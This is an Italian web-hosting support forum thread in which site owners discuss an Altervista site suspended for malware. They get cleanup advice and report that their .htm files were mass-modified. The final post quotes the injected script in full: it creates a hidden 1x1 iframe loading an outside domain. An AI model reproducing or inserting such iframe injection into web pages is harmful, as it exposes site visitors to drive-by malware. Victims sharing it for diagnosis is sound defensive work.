Visualizzazione risultati 1 fino 6 di 6

Discussione: Blocco accesso ftp per segnalazione malware

Guest

Predefinito Blocco accesso ftp per segnalazione malware

Salve,
    ho il sito bloccato per un presunto Malware,
    il sito è http://happyislandbb.altervista.org/

ho aggiornato la password come richiesto, riesco ad entrare nel pannello ma non vedo i files del mio sito e non riesco ancora ad accedere via ftp.

come devo fare?

Grazie in anticipo

Guest

Predefinito

come non detto, ora riesco ad accedere via FTP.
    Come devo fare per far riattivare il mio sito?

Il pc che uso per caricare il mio sito è stato scansionato....senza trovare virus...

L'avatar di dapeco
    dapeco non è connesso Community Manager

Predefinito

Devi eliminare i contenuti (ed il codice nelle pagine) malevoli, cambiare le credenziali, aggiornare eventuali cms e richiedere all'abuse la riattivazione: http://it.altervista.org/contatti.php
    Ho visto cose che voi utenti non potreste immaginare... siti da combattimento irregolari al largo dei bastioni di Orione. E ho visto account balenare nel buio vicino alle porte di Tannhauser. E tutti quei momenti andranno perduti nel tempo come lacrime nella pioggia. È tempo di sospendere...

ASD Brusasco - C'è altro sport oltre al calcio!

"Io sono vivo, voi siete morti" (Philip Dick, Ubik)

Guest

Predefinito

non so quali sono le pagine malevoli, non mi sono segnalate dalla comunicazione ed il sito non è aggiornato da 1 anno.
    ho scaricato l'intero sito e scansionato, ho chiesto già all'abuse ma non mi hanno risposto.

Guest

Predefinito

mmmm un metodo più semplice.... cosa hai caricato ultimamente nel sito??? prova a vedere se nei codici html c'è qualche coleggamento ipertestuale che te non hai fatto oppure qualche strano fle .js nella directory

cgrassi non è connesso Neofita

Predefinito

Su molti siti miei e di altri ho notato che oggi intorno all'una sono stati modificati tutti i file htm.
    E' stato aggiunto uno script:

<!--a6f227--><script type="text/javascript" language="javascript" > (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){doc ument.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendC hild(a);}})();</script><!--/a6f227-->

Non so esttamente che fa certo è che in alcuni casi rende non funzionante la pagina.

Il mio sito l'ho ricaricato, però ho l'impressione che ci sia qualcosa di grosso!!!

Speriamo bene.

A scanso di problemi ho anche cambiato la password di accesso, ho visto che tutti i file .htm sono stati modificati oggi alle 13,30 uno di seguito all'altro a distanza di secondi... in quel periodo il mio PC era spento per cui escludo che dipenda da un virus.

Ho visto molti siti che hanno questo script, basta fare una ricerca con google, in alcuni casi non disturba in altri blocca i menu ecc.
    Ultima modifica di cgrassi : 12-11-2012 alle ore 18.57.15 Motivo: Aggiunte
    cgrassi